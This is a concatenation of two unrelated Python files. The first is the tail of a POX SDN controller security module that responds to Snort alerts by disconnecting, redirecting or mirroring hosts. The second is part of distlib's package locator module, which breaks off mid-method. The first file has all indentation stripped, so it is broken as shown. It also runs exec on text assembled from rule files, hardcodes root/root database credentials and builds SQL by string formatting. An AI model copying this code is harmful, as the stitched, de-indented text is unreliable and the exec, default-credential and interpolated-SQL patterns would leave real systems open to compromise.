cmdgenlist = []
for each in cmds:
item = each.split('\n')
action=item[0].split(',')
if action[0]=="time":
                action[1] = str(float(action[1]))  # validate the number but keep a string for concatenation below
                func_action = "self."+action[0]+"("+action[1]+")"
elif action[0] in self.cmdlist:
if(len(action) == 1):
func_action = "self." + action[0] + "()"
else:
func_action = "self."+action[0]+"("+action[1]+")"
cmdgenlist.append(func_action)
func_action = ''
function = "def "+func_name+"(self, src, dst):\n"
for command in cmdgenlist:
function = function+" "+command+"\n"
exec function
setattr(self.handlers, func_name, eval(func_name))
log.info("handler %s registered, rules updated."%func_name)
def alys_file(self):
for File in self.filelist:
fd = open(self.path + File,'r')
commands = fd.readlines(MAXCMD)
fd.close()
yield File, commands
def alys_cmd(self):
self.filelist = os.listdir(self.path)
self.funclist = []
self.filenum = len(self.filelist)
filegen = self.alys_file()
while self.counter < self.filenum:
File,commands = filegen.next()
self.func_gen(File, commands)
self.counter += 1
def passit(self):
self.action_triggered = True
def disconnect(self,addr):
self.action_triggered = False
if self.droplist.has_key(addr):
self.droplist[addr] += 1
else:
self.droplist[addr] = 1
if self.droplist[addr] != 1:
return
ipaddr = IPAddr(addr)
msg = of.ofp_flow_mod()
msg.priority = MID
if self.iptable.has_key(ipaddr) and self.iptable[ipaddr] != gateway_mac:
#Forbid inside machine from sending packets
host_mac = self.iptable[ipaddr]
switchid = self.mactable[host_mac][0]
msg.match.dl_type = 0x0800
msg.match.dl_src = host_mac
msg.actions.append(of.ofp_action_output(port = of.OFPP_NONE))
else:
switchid = self.mactable[gateway_mac][0]
msg.match.dl_type = 0x0800
msg.match.nw_src = ipaddr
msg.actions.append(of.ofp_action_output(port = of.OFPP_NONE))
switch = core.openflow.getConnection(switchid)
switch.send(msg)
self.action_triggered = True
log.info("%s being disconncted"%addr)
def redirect(self,addr):
self.action_triggered = False
ipaddr = IPAddr(addr)
if not ip2serv_name.has_key(addr):
return
if self.redirectlist.has_key(addr):
self.redirectlist[addr] += 1
else:
self.redirectlist[addr] = 1
if self.redirectlist[addr] == 1:
if self.droplist.has_key(addr):
if ip2serv_name.has_key(addr):
serv_name = ip2serv_name[addr]
if serv_name2ip.has_key(serv_name):
Masterip = serv_name2ip[serv_name][0]
Masteraddr = IPAddr(Masterip)
livelist = [ item for item in serv_name2ip[serv_name] if item not in self.droplist ]
if len(livelist) > 0:
new_ip = random.choice(livelist)
log.info("redirectint for %s to %s \nin the service of %s"%(addr, str(new_ip), serv_name))
new_mac = self.iptable[IPAddr(new_ip)]
msg = of.ofp_flow_mod()
msg.match.dl_dst = self.iptable[Masteraddr]
msg.actions.append(of.ofp_action_dl_addr.set_dst(new_mac))
msg.actions.append(of.ofp_action_nw_addr.set_dst(IPAddr(new_ip)))
msg.priority = HIGH
routelist = RouteApp.get_shortest_route(pox.openflow.spanning_tree._calc_spanning_tree(), self.mactable[gateway_mac][0], self.mactable[new_mac][0])
routelist[-1] = self.mactable[new_mac]
msg.actions.append(of.ofp_action_output(port = routelist[0][1]))
switchid = self.mactable[gateway_mac][0]
switch = core.openflow.getConnection(switchid)
switch.send(msg)
msg = of.ofp_flow_mod()
msg.match.dl_src = self.iptable[IPAddr(new_ip)]
msg.match.dl_dst = gateway_mac
msg.priority = HIGH
#msg.match.nw_proto = pkt.ipv4.TCP_PROTOCO
msg.actions.append(of.ofp_action_dl_addr.set_src(self.iptable[ipaddr]))
msg.actions.append(of.ofp_action_nw_addr.set_src(ipaddr))
msg.actions.append(of.ofp_action_output(port = self.mactable[gateway_mac][1]))
switchid = self.mactable[gateway_mac][0]
switch = core.openflow.getConnection(switchid)
switch.send(msg)
self.action_triggered = True
else:
log.error("no more same service ip to redirect")
else:
log.error("check the service to ip dictionary %s"%serv_name)
else:
log.error("check the ip to service dictionary %s"%addr)
else:
log.error("%s is not in droplist"%addr)
def wait(self,arg):
#if self.action_triggered:
log.info("waiting for %d seconds"%arg)
time.sleep(arg)
def reconnect(self,addr):
self.action_triggered = False
self.droplist[addr] -= 1
if self.droplist[addr] <= 0:
ipaddr = IPAddr(addr)
self.droplist[addr] = 0
log.info("%s being reconnected"%addr)
msg = of.ofp_flow_mod()
msg.command = of.OFPFC_DELETE_STRICT
msg.priority = MID
msg.actions.append(of.ofp_action_output(port = of.OFPP_NONE))
if self.iptable.has_key(ipaddr) and self.iptable[ipaddr] != gateway_mac:
host_mac = self.iptable[ipaddr]
switchid = self.mactable[host_mac][0]
msg.match.dl_type = 0x0800
msg.match.dl_src = host_mac
else:
switchid = self.mactable[gateway_mac][0]
msg.match.dl_type = 0x0800
msg.match.nw_src = ipaddr
switch = core.openflow.getConnection(switchid)
switch.send(msg)
self.action_triggered = True
def monitor(self, addr):
self.action_triggered = False
ipaddr = IPAddr(addr)
if not self.iptable.has_key(ipaddr):
return
if self.iptable[ipaddr] == gateway_mac:
return
if self.monitorlist.has_key(addr):
self.monitorlist[addr] += 1
else:
self.monitorlist[addr] = 1
if self.monitorlist[addr] == 1:
log.info("packet from/to %s mirrored for monitoring"%addr)
#msg = nx.nx_flow_mod()
#msg.table_id = 1
msg = of.ofp_flow_mod()
msg.priority = LOWMID
#msg.match.eth_src = self.iptable[ipaddr]
msg.match.dl_src = self.iptable[ipaddr]
msg.match.dl_type = 0x0800
msg.actions.append(of.ofp_action_dl_addr.set_dst(gateway_mac))
routelist = RouteApp.get_shortest_route(pox.openflow.spanning_tree._calc_spanning_tree(), self.mactable[self.iptable[ipaddr]][0], self.mactable[gateway_mac][0])
routelist[-1] = self.mactable[gateway_mac]
msg.actions.append(of.ofp_action_output(port = routelist[0][1]))
switchid = self.mactable[self.iptable[ipaddr]][0]
switch = core.openflow.getConnection(switchid)
switch.send(msg)
self.action_triggered = True
#delete all flow entries in flowtable 1
def reset(self, addr):
self.action_triggered = False
self.monitorlist[addr] -= 1
if self.monitorlist[addr] > 0:
return
self.monitorlist[addr] = 0
log.info("resetting %s"%addr)
msg = nx.nx_flow_mod()
msg.command = of.OFPFC_DELETE_STRICT
msg.table_id = 1
ipaddr = IPAddr(addr)
host_mac = self.iptable[ipaddr]
msg.match.eth_src = host_mac
switchid = self.mactable[host_mac][0]
switch = core.openflow.getConnection(switchid)
switch.send(msg)
self.action_triggered = True
def unredirect(self, addr):
self.action_triggered = False
self.redirectlist[addr] -= 1
if self.redirectlist[addr] > 0:
return
self.redirectlist[addr] = 0
log.info("unredirecting %s"%addr)
msg = nx.nx_flow_mod()
msg.command = of.OFPFC_DELETE_STRICT
msg.table_id = 1
serv_name = ip2serv_name[addr]
        Masterip = serv_name2ip[serv_name][0]  # first entry is the master IP, as in redirect()
Masteraddr = IPAddr(Masterip)
host_mac = self.iptable[Masteraddr]
msg.match.eth_dst = host_mac
msg.match.of_ip_src = Masterip
switchid = self.mactable[gateway_mac][0]
switch = core.openflow.getConnection(switchid)
switch.send(msg)
self.action_triggered = True
def name_process(self):
for func_name in self.funclist:
value = func_name.split('_')
del value[0]
if not self.func_table.has_key(value[0]):
self.func_table[value[0]]={}
if not self.func_table[value[0]].has_key(value[1]):
self.func_table[value[0]][value[1]] = {}
if (len(value) == 4):
self.func_table[value[0]][value[1]][(value[2],value[3])] = func_name
else:
self.func_table[value[0]][value[1]]["any"] = func_name
    # {priority: {signature: {(interval, times): funcname}}}
def occa_process(self, occation, during):
timeArray = time.strptime(occation, "%Y-%m-%d %H:%M:%S")
timeStamp = time.mktime(timeArray)
timeStamp -= float(during)
timeArray = time.localtime(timeStamp)
before = time.strftime("%Y-%m-%d %H:%M:%S", timeArray)
return before
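    # A small worked example of occa_process (timestamps are placeholders):
    #
    #     self.occa_process("2016-01-01 12:00:30", "30")
    #     # -> "2016-01-01 12:00:00", i.e. the alert time minus the 30 s window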
def _handle_AlertIn(self, event):
log.info("Alert In.")
sig = event.name
occation = event.occation
priority = event.priority
sip = event.src
dip = event.dst
if self.monitorlist.has_key(sip) and self.monitorlist[sip] > 0 and not sig in self.ignorelist:
log.info("%s is under attack and may have been captured, so disconncet it."%sip)
self.disconnect(sip)
func_name = "func_"
if self.func_table.has_key(priority):
func_name += priority
if self.func_table[priority].has_key(sig):
func_name += "_" + sig
if (len(self.func_table[priority][sig]) == 1) and (self.func_table[priority][sig].keys()[0] == "any"):
func_name += "_any"
else:
timelist = [item for item in self.func_table[priority][sig].keys()]
flag = False
for time in timelist:
before = self.occa_process(occation, time[0])
times = self.sql(before, occation, sip, dip)
log.info("this has happened:%d times"%times)
if times >= int(time[1]):
func_name += "_" + time[0] + "_" + time[1]
flag = True
break
if not flag:
if (self.func_table[priority][sig].has_key("any")):
func_name += "_any"
else:
log.error("No Strategy")
return
elif (self.func_table[priority].has_key("any")):
func_name += "_any"
if (len(self.func_table[priority]["any"]) == 1) and (self.func_table[priority][sig][self.func_table[priority]["any"].keys()[0]] == "any"):
func_name += "_any"
else:
timelist = [item for item in self.func_table[priority]["any"].keys()]
flag = False
for time in timelist:
before = self.occa_process(occation, time[0])
times = self.sql(before, occation, sip, dip)
log.info("this has happened:%d times"%times)
if times >= int(time[1]):
func_name += "_" + time[0] + "_" + time[1]
flag = True
break
if not flag:
if (self.func_table[priority]["any"].has_key("any")):
func_name += "_any"
else:
log.error("No Strategy")
return
else:
log.error("No Strategy for signatrue %s"%sig)
return
else:
log.error("No Strategy for priority %s"%priority)
return
func_name = func_name.replace(" ", "_")
new_th = threading.Thread(target = getattr(self.handlers, func_name), args=(self, sip, dip))
new_th.start()
def sql(self, before, occation, src, dst):
try:
conn = mysql.connector.connect(host=SNORT_ADDR, user='root',passwd='root',db='snort')
except Exception, e:
log.error(e)
sys.exit(-1)
cursor = conn.cursor()
cursor.execute("select count(*) as times from iphdr,event where (event.timestamp between '%s' and '%s') and (iphdr.ip_src=%d and iphdr.ip_dst=%d) and iphdr.cid=event.cid;"%(before, occation, socket.ntohl(struct.unpack("I", socket.inet_aton(src))[0]), socket.ntohl(struct.unpack("I", socket.inet_aton(dst))[0])))
rows = cursor.fetchone()
cursor.close()
conn.close()
return rows[0]
def _handle_ConnectionUp(self, event):
msg = nx.nx_packet_in_format()
event.connection.send(msg)
msg = nx.nx_flow_mod_table_id()
event.connection.send(msg)
msg = nx.nx_flow_mod(command = of.OFPFC_DELETE)
msg.table_id = 1
event.connection.send(msg)
def _handle_PacketIn(self, event):
packet = event.parsed
#the flood method
def flood(switch):
msg = of.ofp_packet_out()
msg.actions.append(of.ofp_action_output(port = of.OFPP_FLOOD))
msg.data = event.ofp
msg.in_port = event.port
switch.send(msg)
#the drop method
def drop(switch):
msg = of.ofp_packet_out()
msg.buffer_id = event.ofp.buffer_id
msg.in_port = event.port
switch.send(msg)
ip = packet.find("ipv4")
if ip == None:
ip = packet.find("icmp")
if ip:
if not self.iptable.has_key(ip.srcip):
self.iptable[ip.srcip] = packet.src
if not self.mactable.has_key(packet.src):
self.mactable[packet.src] = (event.dpid, event.port)
if packet.type == packet.LLDP_TYPE or packet.dst.isBridgeFiltered():
drop(event.connection)
return
if packet.dst.is_multicast:
flood(event.connection)
else:
if not self.mactable.has_key(packet.dst):
flood(event.connection)
else:
routelist = RouteApp.get_shortest_route(pox.openflow.spanning_tree._calc_spanning_tree(), event.dpid, self.mactable[packet.dst][0])
routelist[-1] = self.mactable[packet.dst]
msg = of.ofp_packet_out()
msg.data = event.ofp
msg.actions.append(of.ofp_action_output(port = routelist[0][1]))
event.connection.send(msg)
for switchid,out_port in routelist:
msg = nx.nx_flow_mod()
msg.table_id = 0
msg.priority = LOW
msg.match.eth_dst = packet.dst
msg.actions.append(of.ofp_action_output(port = out_port))
#msg.actions.append(nx.nx_action_resubmit.resubmit_table(table = 1))
msg.idle_timeout = 10
msg.hard_timeout = 30
switch = core.openflow.getConnection(switchid)
switch.send(msg)
def launch():
path = "./rules/"
core.registerNew(Reminder)
core.registerNew(secure, path)
log.info("Secure module launched.")
|
locators.py
|
# -*- coding: utf-8 -*-
#
# Copyright (C) 2012-2015 Vinay Sajip.
# Licensed to the Python Software Foundation under a contributor agreement.
# See LICENSE.txt and CONTRIBUTORS.txt.
#
import gzip
from io import BytesIO
import json
import logging
import os
import posixpath
import re
try:
import threading
except ImportError: # pragma: no cover
import dummy_threading as threading
import zlib
from . import DistlibException
from .compat import (urljoin, urlparse, urlunparse, url2pathname, pathname2url,
queue, quote, unescape, string_types, build_opener,
HTTPRedirectHandler as BaseRedirectHandler, text_type,
Request, HTTPError, URLError)
from .database import Distribution, DistributionPath, make_dist
from .metadata import Metadata
from .util import (cached_property, parse_credentials, ensure_slash,
split_filename, get_project_data, parse_requirement,
parse_name_and_version, ServerProxy, normalize_name)
from .version import get_scheme, UnsupportedVersionError
from .wheel import Wheel, is_compatible
logger = logging.getLogger(__name__)
HASHER_HASH = re.compile(r'^(\w+)=([a-f0-9]+)')
CHARSET = re.compile(r';\s*charset\s*=\s*(.*)\s*$', re.I)
HTML_CONTENT_TYPE = re.compile('text/html|application/x(ht)?ml')
DEFAULT_INDEX = 'https://pypi.python.org/pypi'
def get_all_distribution_names(url=None):
"""
Return all distribution names known by an index.
:param url: The URL of the index.
:return: A list of all known distribution names.
"""
if url is None:
url = DEFAULT_INDEX
client = ServerProxy(url, timeout=3.0)
return client.list_packages()
class RedirectHandler(BaseRedirectHandler):
"""
A class to work around a bug in some Python 3.2.x releases.
"""
# There's a bug in the base version for some 3.2.x
# (e.g. 3.2.2 on Ubuntu Oneiric). If a Location header
# returns e.g. /abc, it bails because it says the scheme ''
# is bogus, when actually it should use the request's
# URL for the scheme. See Python issue #13696.
def http_error_302(self, req, fp, code, msg, headers):
# Some servers (incorrectly) return multiple Location headers
# (so probably same goes for URI). Use first header.
newurl = None
for key in ('location', 'uri'):
if key in headers:
newurl = headers[key]
break
if newurl is None:
return
urlparts = urlparse(newurl)
if urlparts.scheme == '':
newurl = urljoin(req.get_full_url(), newurl)
if hasattr(headers, 'replace_header'):
headers.replace_header(key, newurl)
else:
headers[key] = newurl
return BaseRedirectHandler.http_error_302(self, req, fp, code, msg,
headers)
http_error_301 = http_error_303 = http_error_307 = http_error_302
class Locator(object):
"""
A base class for locators - things that locate distributions.
"""
source_extensions = ('.tar.gz', '.tar.bz2', '.tar', '.zip', '.tgz', '.tbz')
binary_extensions = ('.egg', '.exe', '.whl')
excluded_extensions = ('.pdf',)
# A list of tags indicating which wheels you want to match. The default
# value of None matches against the tags compatible with the running
# Python. If you want to match other values, set wheel_tags on a locator
# instance to a list of tuples (pyver, abi, arch) which you want to match.
wheel_tags = None
downloadable_extensions = source_extensions + ('.whl',)
def __init__(self, scheme='default'):
"""
Initialise an instance.
:param scheme: Because locators look for most recent versions, they
need to know the version scheme to use. This specifies
the current PEP-recommended scheme - use ``'legacy'``
if you need to support existing distributions on PyPI.
"""
self._cache = {}
self.scheme = scheme
# Because of bugs in some of the handlers on some of the platforms,
# we use our own opener rather than just using urlopen.
self.opener = build_opener(RedirectHandler())
# If get_project() is called from locate(), the matcher instance
# is set from the requirement passed to locate(). See issue #18 for
# why this can be useful to know.
self.matcher = None
self.errors = queue.Queue()
def get_errors(self):
"""
Return any errors which have occurred.
"""
result = []
while not self.errors.empty(): # pragma: no cover
try:
e = self.errors.get(False)
result.append(e)
            except queue.Empty:
continue
self.errors.task_done()
return result
def clear_errors(self):
"""
Clear any errors which may have been logged.
"""
# Just get the errors and throw them away
self.get_errors()
def clear_cache(self):
self._cache.clear()
def _get_scheme(self):
return self._scheme
def _set_scheme(self, value):
self._scheme = value
scheme = property(_get_scheme, _set_scheme)
def _get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This should be implemented in subclasses.
If called from a locate() request, self.matcher will be set to a
matcher for the requirement to satisfy, otherwise it will be None.
"""
raise NotImplementedError('Please implement in the subclass')
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Please implement in the subclass')
def get_project(self, name):
"""
For a given project, get a dictionary mapping available versions to Distribution
instances.
This calls _get_project to do all the work, and just implements a caching layer on top.
"""
if self._cache is None:
result = self._get_project(name)
elif name in self._cache:
result = self._cache[name]
else:
self.clear_errors()
result = self._get_project(name)
self._cache[name] = result
return result
def score_url(self, url):
"""
Give an url a score which can be used to choose preferred URLs
for a given project release.
"""
t = urlparse(url)
basename = posixpath.basename(t.path)
compatible = True
is_wheel = basename.endswith('.whl')
if is_wheel:
compatible = is_compatible(Wheel(basename), self.wheel_tags)
        # prefer_url() keeps the URL whose score tuple compares greater, so
        # https and PyPI-hosted archives must score True here.
        return (t.scheme == 'https', 'pypi.python.org' in t.netloc,
                is_wheel, compatible, basename)
def prefer_url(self, url1, url2):
"""
Choose one of two URLs where both are candidates for distribution
archives for the same version of a distribution (for example,
.tar.gz vs. zip).
The current implementation favours https:// URLs over http://, archives
from PyPI over those from other locations, wheel compatibility (if a
wheel) and then the archive name.
"""
result = url2
if url1:
s1 = self.score_url(url1)
s2 = self.score_url(url2)
if s1 > s2:
result = url1
if result != url2:
logger.debug('Not replacing %r with %r', url1, url2)
else:
logger.debug('Replacing %r with %r', url1, url2)
return result
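    # A worked illustration of the ordering prefer_url relies on (the URLs are
    # placeholders): score_url yields a tuple that compares greater for https,
    # PyPI-hosted archives and compatible wheels, and prefer_url keeps whichever
    # candidate scores higher.
    #
    #     loc.prefer_url('http://example.com/proj-1.0.zip',
    #                    'https://pypi.python.org/packages/proj-1.0.tar.gz')
    #     # -> 'https://pypi.python.org/packages/proj-1.0.tar.gz'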
def split_filename(self, filename, project_name):
"""
Attempt to split a filename in project name, version and Python version.
"""
return split_filename(filename, project_name)
def convert_url_to_download_info(self, url, project_name):
"""
See if a URL is a candidate for a download URL for a project (the URL
has typically been scraped from an HTML page).
If it is, a dictionary is returned with keys "name", "version",
"filename" and "url"; otherwise, None is returned.
"""
def same_project(name1, name2):
return normalize_name(name1) == normalize_name(name2)
result = None
scheme, netloc, path, params, query, frag = urlparse(url)
if frag.lower().startswith('egg='):
logger.debug('%s: version hint in fragment: %r',
project_name, frag)
m = HASHER_HASH.match(frag)
if m:
algo, digest = m.groups()
else:
algo, digest = None, None
origpath = path
if path and path[-1] == '/':
path = path[:-1]
if path.endswith('.whl'):
try:
wheel = Wheel(path)
if is_compatible(wheel, self.wheel_tags):
if project_name is None:
include = True
else:
include = same_project(wheel.name, project_name)
if include:
result = {
'name': wheel.name,
'version': wheel.version,
'filename': wheel.filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
'python-version': ', '.join(
['.'.join(list(v[2:])) for v in wheel.pyver]),
}
except Exception as e: # pragma: no cover
logger.warning('invalid path for wheel: %s', path)
elif path.endswith(self.downloadable_extensions):
path = filename = posixpath.basename(path)
for ext in self.downloadable_extensions:
if path.endswith(ext):
path = path[:-len(ext)]
t = self.split_filename(path, project_name)
if not t:
logger.debug('No match for project/version: %s', path)
else:
name, version, pyver = t
if not project_name or same_project(project_name, name):
result = {
'name': name,
'version': version,
'filename': filename,
'url': urlunparse((scheme, netloc, origpath,
params, query, '')),
#'packagetype': 'sdist',
}
if pyver:
result['python-version'] = pyver
break
if result and algo:
result['%s_digest' % algo] = digest
return result
def _get_digest(self, info):
"""
Get a digest from a dictionary by looking at keys of the form
'algo_digest'.
Returns a 2-tuple (algo, digest) if found, else None. Currently
looks only for SHA256, then MD5.
"""
result = None
for algo in ('sha256', 'md5'):
key = '%s_digest' % algo
if key in info:
result = (algo, info[key])
break
return result
def _update_version_data(self, result, info):
"""
Update a result dictionary (the final result from _get_project) with a
dictionary for a specific version, which typically holds information
gleaned from a filename or URL for an archive for the distribution.
"""
name = info.pop('name')
version = info.pop('version')
if version in result:
dist = result[version]
md = dist.metadata
else:
dist = make_dist(name, version, scheme=self.scheme)
md = dist.metadata
dist.digest = digest = self._get_digest(info)
url = info['url']
result['digests'][url] = digest
if md.source_url != info['url']:
md.source_url = self.prefer_url(md.source_url, url)
result['urls'].setdefault(version, set()).add(url)
dist.locator = self
result[version] = dist
def locate(self, requirement, prereleases=False):
"""
Find the most recent distribution which matches the given
requirement.
:param requirement: A requirement of the form 'foo (1.0)' or perhaps
'foo (>= 1.0, < 2.0, != 1.3)'
:param prereleases: If ``True``, allow pre-release versions
to be located. Otherwise, pre-release versions
are not returned.
:return: A :class:`Distribution` instance, or ``None`` if no such
distribution could be located.
"""
result = None
r = parse_requirement(requirement)
if r is None:
raise DistlibException('Not a valid requirement: %r' % requirement)
scheme = get_scheme(self.scheme)
self.matcher = matcher = scheme.matcher(r.requirement)
logger.debug('matcher: %s (%s)', matcher, type(matcher).__name__)
versions = self.get_project(r.name)
if len(versions) > 2: # urls and digests keys are present
# sometimes, versions are invalid
slist = []
vcls = matcher.version_class
for k in versions:
if k in ('urls', 'digests'):
continue
try:
if not matcher.match(k):
logger.debug('%s did not match %r', matcher, k)
else:
if prereleases or not vcls(k).is_prerelease:
slist.append(k)
else:
logger.debug('skipping pre-release '
'version %s of %s', k, matcher.name)
except Exception: # pragma: no cover
logger.warning('error matching %s with %r', matcher, k)
pass # slist.append(k)
if len(slist) > 1:
slist = sorted(slist, key=scheme.key)
if slist:
logger.debug('sorted list: %s', slist)
version = slist[-1]
result = versions[version]
if result:
if r.extras:
result.extras = r.extras
result.download_urls = versions.get('urls', {}).get(version, set())
d = {}
sd = versions.get('digests', {})
for url in result.download_urls:
if url in sd:
d[url] = sd[url]
result.digests = d
self.matcher = None
return result
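# A minimal usage sketch for Locator.locate(); the index URL and the
# requirement string are placeholders:
#
#     locator = SimpleScrapingLocator('https://pypi.python.org/simple/', timeout=10)
#     dist = locator.locate('requests (>= 2.0)')
#     if dist is not None:
#         print(dist.name, dist.version)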
class PyPIRPCLocator(Locator):
"""
This locator uses XML-RPC to locate distributions. It therefore
cannot be used with simple mirrors (that only mirror file content).
"""
def __init__(self, url, **kwargs):
"""
Initialise an instance.
:param url: The URL to use for XML-RPC.
:param kwargs: Passed to the superclass constructor.
"""
super(PyPIRPCLocator, self).__init__(**kwargs)
self.base_url = url
self.client = ServerProxy(url, timeout=3.0)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
return set(self.client.list_packages())
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
versions = self.client.package_releases(name, True)
for v in versions:
urls = self.client.release_urls(name, v)
data = self.client.release_data(name, v)
metadata = Metadata(scheme=self.scheme)
metadata.name = data['name']
metadata.version = data['version']
metadata.license = data.get('license')
metadata.keywords = data.get('keywords', [])
metadata.summary = data.get('summary')
dist = Distribution(metadata)
if urls:
info = urls[0]
metadata.source_url = info['url']
dist.digest = self._get_digest(info)
dist.locator = self
result[v] = dist
for info in urls:
url = info['url']
digest = self._get_digest(info)
result['urls'].setdefault(v, set()).add(url)
result['digests'][url] = digest
return result
class PyPIJSONLocator(Locator):
"""
This locator uses PyPI's JSON interface. It's very limited in functionality
and probably not worth using.
"""
def __init__(self, url, **kwargs):
super(PyPIJSONLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
def get_distribution_names(self):
"""
Return all the distribution names known to this locator.
"""
raise NotImplementedError('Not available from this locator')
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
url = urljoin(self.base_url, '%s/json' % quote(name))
try:
resp = self.opener.open(url)
data = resp.read().decode() # for now
d = json.loads(data)
md = Metadata(scheme=self.scheme)
data = d['info']
md.name = data['name']
md.version = data['version']
md.license = data.get('license')
md.keywords = data.get('keywords', [])
md.summary = data.get('summary')
dist = Distribution(md)
dist.locator = self
urls = d['urls']
result[md.version] = dist
for info in d['urls']:
url = info['url']
dist.download_urls.add(url)
dist.digests[url] = self._get_digest(info)
result['urls'].setdefault(md.version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# Now get other releases
for version, infos in d['releases'].items():
if version == md.version:
continue # already done
omd = Metadata(scheme=self.scheme)
omd.name = md.name
omd.version = version
odist = Distribution(omd)
odist.locator = self
result[version] = odist
for info in infos:
url = info['url']
odist.download_urls.add(url)
odist.digests[url] = self._get_digest(info)
result['urls'].setdefault(version, set()).add(url)
result['digests'][url] = self._get_digest(info)
# for info in urls:
# md.source_url = info['url']
# dist.digest = self._get_digest(info)
# dist.locator = self
# for info in urls:
# url = info['url']
# result['urls'].setdefault(md.version, set()).add(url)
# result['digests'][url] = self._get_digest(info)
except Exception as e:
self.errors.put(text_type(e))
logger.exception('JSON fetch failed: %s', e)
return result
class Page(object):
"""
This class represents a scraped HTML page.
"""
# The following slightly hairy-looking regex just looks for the contents of
# an anchor link, which has an attribute "href" either immediately preceded
# or immediately followed by a "rel" attribute. The attribute values can be
# declared with double quotes, single quotes or no quotes - which leads to
# the length of the expression.
_href = re.compile("""
(rel\s*=\s*(?:"(?P<rel1>[^"]*)"|'(?P<rel2>[^']*)'|(?P<rel3>[^>\s\n]*))\s+)?
href\s*=\s*(?:"(?P<url1>[^"]*)"|'(?P<url2>[^']*)'|(?P<url3>[^>\s\n]*))
(\s+rel\s*=\s*(?:"(?P<rel4>[^"]*)"|'(?P<rel5>[^']*)'|(?P<rel6>[^>\s\n]*)))?
""", re.I | re.S | re.X)
_base = re.compile(r"""<base\s+href\s*=\s*['"]?([^'">]+)""", re.I | re.S)
def __init__(self, data, url):
"""
Initialise an instance with the Unicode page contents and the URL they
came from.
"""
self.data = data
self.base_url = self.url = url
m = self._base.search(self.data)
if m:
self.base_url = m.group(1)
_clean_re = re.compile(r'[^a-z0-9$&+,/:;=?@.#%_\\|-]', re.I)
@cached_property
def links(self):
"""
Return the URLs of all the links on a page together with information
about their "rel" attribute, for determining which ones to treat as
downloads and which ones to queue for further scraping.
"""
def clean(url):
"Tidy up an URL."
scheme, netloc, path, params, query, frag = urlparse(url)
return urlunparse((scheme, netloc, quote(path),
params, query, frag))
result = set()
for match in self._href.finditer(self.data):
d = match.groupdict('')
rel = (d['rel1'] or d['rel2'] or d['rel3'] or
d['rel4'] or d['rel5'] or d['rel6'])
url = d['url1'] or d['url2'] or d['url3']
url = urljoin(self.base_url, url)
url = unescape(url)
url = self._clean_re.sub(lambda m: '%%%2x' % ord(m.group(0)), url)
result.add((url, rel))
# We sort the result, hoping to bring the most recent versions
# to the front
result = sorted(result, key=lambda t: t[0], reverse=True)
return result
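# A minimal usage sketch for Page; the markup and base URL are placeholders:
#
#     page = Page('<a href="proj-1.0.tar.gz" rel="download">proj 1.0</a>',
#                 'https://example.com/simple/proj/')
#     for url, rel in page.links:
#         print(url, rel)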
class SimpleScrapingLocator(Locator):
"""
A locator which scrapes HTML pages to locate downloads for a distribution.
This runs multiple threads to do the I/O; performance is at least as good
as pip's PackageFinder, which works in an analogous fashion.
"""
# These are used to deal with various Content-Encoding schemes.
decoders = {
'deflate': zlib.decompress,
        'gzip': lambda b: gzip.GzipFile(fileobj=BytesIO(b)).read(),
'none': lambda b: b,
}
def __init__(self, url, timeout=None, num_workers=10, **kwargs):
"""
Initialise an instance.
:param url: The root URL to use for scraping.
:param timeout: The timeout, in seconds, to be applied to requests.
This defaults to ``None`` (no timeout specified).
:param num_workers: The number of worker threads you want to do I/O,
This defaults to 10.
:param kwargs: Passed to the superclass.
"""
super(SimpleScrapingLocator, self).__init__(**kwargs)
self.base_url = ensure_slash(url)
self.timeout = timeout
self._page_cache = {}
self._seen = set()
self._to_fetch = queue.Queue()
self._bad_hosts = set()
self.skip_externals = False
self.num_workers = num_workers
self._lock = threading.RLock()
# See issue #45: we need to be resilient when the locator is used
# in a thread, e.g. with concurrent.futures. We can't use self._lock
# as it is for coordinating our internal threads - the ones created
# in _prepare_threads.
self._gplock = threading.RLock()
def _prepare_threads(self):
"""
Threads are created only when get_project is called, and terminate
before it returns. They are there primarily to parallelise I/O (i.e.
fetching web pages).
"""
self._threads = []
for i in range(self.num_workers):
t = threading.Thread(target=self._fetch)
            t.daemon = True
t.start()
self._threads.append(t)
def _wait_threads(self):
"""
Tell all the threads to terminate (by sending a sentinel value) and
wait for them to do so.
"""
# Note that you need two loops, since you can't say which
# thread will get each sentinel
for t in self._threads:
self._to_fetch.put(None) # sentinel
for t in self._threads:
t.join()
self._threads = []
def _get_project(self, name):
result = {'urls': {}, 'digests': {}}
with self._gplock:
self.result = result
self.project_name = name
url = urljoin(self.base_url, '%s/' % quote(name))
self._seen.clear()
self._page_cache.clear()
self._prepare_threads()
try:
logger.debug('Queueing %s', url)
self._to_fetch.put(url)
self._to_fetch.join()
finally:
self._wait_threads()
del self.result
return result
platform_dependent = re.compile(r'\b(linux-(i\d86|x86_64|arm\w+)|'
r'win(32|-amd64)|macosx-?\d+)\b', re.I)
def _is_platform_dependent(self, url):
"""
Does an URL refer to a platform-specific download?
"""
return self.platform_dependent.search(url)
def _process_download(self, url):
"""
See if an URL is a suitable download for a project.
If it is, register information in the result dictionary (for
_get_project) about the specific version it's for.
Note that the return value isn't actually used other than as a boolean
value.
"""
if self._is_platform_dependent(url):
info = None
else:
info = self.convert_url_to_download_info(url, self.project_name)
logger.debug('process_download: %s -> %s', url, info)
if info:
with self._lock: # needed because self.result is shared
self._update_version_data(self.result, info)
return info
def _should_queue(self, link, referrer, rel):
"""
Determine whether a link URL from a referring page and with a
particular "rel" attribute should be queued for scraping.
"""
scheme, netloc, path, _, _, _ = urlparse(link)
if path.endswith(self.source_extensions + self.binary_extensions +
self.excluded_extensions):
result = False
elif self.skip_externals and not link.startswith(self.base_url):
result = False
elif not referrer.startswith(self.base_url):
result = False
elif rel not in ('homepage', 'download'):
result = False
elif scheme not in ('http', 'https', 'ftp'):
result = False
elif self._is_platform_dependent(link):
result = False
else:
host = netloc.split(':', 1)[0]
if host.lower() == 'localhost':
result = False
else:
result = True
logger.debug('should_queue: %s (%s) from %s -> %s', link, rel,
referrer, result)
return result
def _fetch(self):
"""
Get a URL to fetch from the work queue, get the HTML page, examine its
links for download candidates and candidates for further scraping.
This is a handy method to run in a thread.
"""
while True:
